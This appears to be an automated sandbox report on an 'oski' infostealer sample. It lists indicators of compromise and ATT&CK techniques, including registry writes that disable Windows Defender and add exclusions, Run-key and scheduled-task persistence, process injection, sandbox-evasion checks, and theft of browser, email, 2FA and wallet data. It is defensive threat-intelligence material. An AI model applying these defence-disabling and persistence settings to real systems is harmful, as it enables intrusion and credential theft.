oski | 65fa93616cdb8c92a541dd2ad8468d6688e1b1f2606891b56db3e90fbfc9acbd

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Lulevugodu.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sAeNYVsWrM.url	Mutato.exe.com

Loads dropped DLL 64 IoCs

pid	Process
2800	Install.tmp
4644	installer.exe
4644	installer.exe
5048	svchost.exe
4644	installer.exe
5048	svchost.exe
5048	svchost.exe
5012	MsiExec.exe
5012	MsiExec.exe
2432	rundll32.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
5768	SunLabsPlayer.exe
4556	MsiExec.exe
4644	powershell.exe
5072	toolspab1.exe
4556	MsiExec.exe
4556	MsiExec.exe
4556	MsiExec.exe
5768	SunLabsPlayer.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
2228	MsiExec.exe
4556	MsiExec.exe
5492	y1.exe
5492	y1.exe
5492	y1.exe
5492	y1.exe
5492	y1.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
4452	powershell.exe
4452	powershell.exe
4956	3529.exe
5184	5229.exe
5184	5229.exe
5184	5229.exe
5184	5229.exe
5184	5229.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe
5768	SunLabsPlayer.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	0GT3idJpQE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe = "0"	sqlcmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\0GT3idJpQE.exe = "0"	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	0GT3idJpQE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe = "0"	0GT3idJpQE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	0GT3idJpQE.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NXfSHgjpzLhX = "0"	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	0GT3idJpQE.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Faeshaweligo.exe\""	Ultra.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gpooe.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg8_mysu.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
249	api.myip.com
250	api.myip.com
298	myexternalip.com
299	myexternalip.com
66	ip-api.com

Drops file in System32 directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\PjPVhJpbFf	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent D23CD004EE1349B3	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\2IG10C9M.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\2IG10C9M.cookie	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Azure-Update-Task	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\NXfSHgjpzLhX	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

pid	Process
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
3788	2C9C.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe
4948	5229.exe

Suspicious use of SetThreadContext 24 IoCs

description	pid	Process	procid_target
PID 4600 set thread context of 5048	4600	Conhost.exe	103
PID 4076 set thread context of 4588	4076	svchost.exe	117
PID 5852 set thread context of 5072	5852	cmd.exe	163
PID 3788 set thread context of 4452	3788	2C9C.exe	356
PID 4712 set thread context of 5372	4712	3140.exe	229
PID 4948 set thread context of 5184	4948	5229.exe	231
PID 5240 set thread context of 8144	5240	0GT3idJpQE.exe	306
PID 5300 set thread context of 6176	5300	Fessura.exe.com	309
PID 5772 set thread context of 6516	5772	Mutato.exe.com	353
PID 4628 set thread context of 7596	4628	sqlcmd.exe	412
PID 3464 set thread context of 6524	3464	jwtwjbt	481
PID 4564 set thread context of 6676	4564	sqlcmd.exe	483
PID 6496 set thread context of 7076	6496	sqlcmd.exe	553
PID 7992 set thread context of 3844	7992	sqlcmd.exe	623
PID 5356 set thread context of 660	5356	sqlcmd.exe	692
PID 5608 set thread context of 2124	5608	sqlcmd.exe	765
PID 3892 set thread context of 1576	3892	jwtwjbt	835
PID 5876 set thread context of 816	5876	sqlcmd.exe	834
PID 2424 set thread context of 2716	2424	sqlcmd.exe	903
PID 7768 set thread context of 4312	7768	sqlcmd.exe	975
PID 5904 set thread context of 4348	5904	sqlcmd.exe	1043
PID 7796 set thread context of 7912	7796	sqlcmd.exe	1111
PID 4896 set thread context of 3800	4896	jwtwjbt	1184
PID 3832 set thread context of 7108	3832	sqlcmd.exe	1185

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\data_load.exe	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\NXfSHgjpzLhX\cache.dat	powershell.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 37 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI4EB0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5336.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DE4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI371B.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe	0GT3idJpQE.exe
File created	C:\Windows\Installer\f74f821.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f74f821.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI35D2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFDDE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8AE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3574.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2E5D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI32E2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB13.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2BBC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI44BA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI551B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI99A.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4A87.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5057.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe	0GT3idJpQE.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI811.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI27E3.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\f74f824.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5B86.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI6F7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAA4.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5068	3788	WerFault.exe	201
4828	4948	WerFault.exe	220

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jwtwjbt

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
8160	schtasks.exe
64	schtasks.exe
7992	schtasks.exe
6888	schtasks.exe
4604	schtasks.exe
4340	schtasks.exe
2716	schtasks.exe
6464	schtasks.exe
7696	schtasks.exe
6012	schtasks.exe
7388	schtasks.exe
1540	schtasks.exe
7176	schtasks.exe
7656	schtasks.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
4644	timeout.exe
4916	timeout.exe
4512	timeout.exe
4804	timeout.exe
6124	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4616	bitsadmin.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
4668	taskkill.exe
5976	taskkill.exe
4808	taskkill.exe
5580	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 37 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{61005523-5D2E-496B-825D-C31C75662064}USER	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
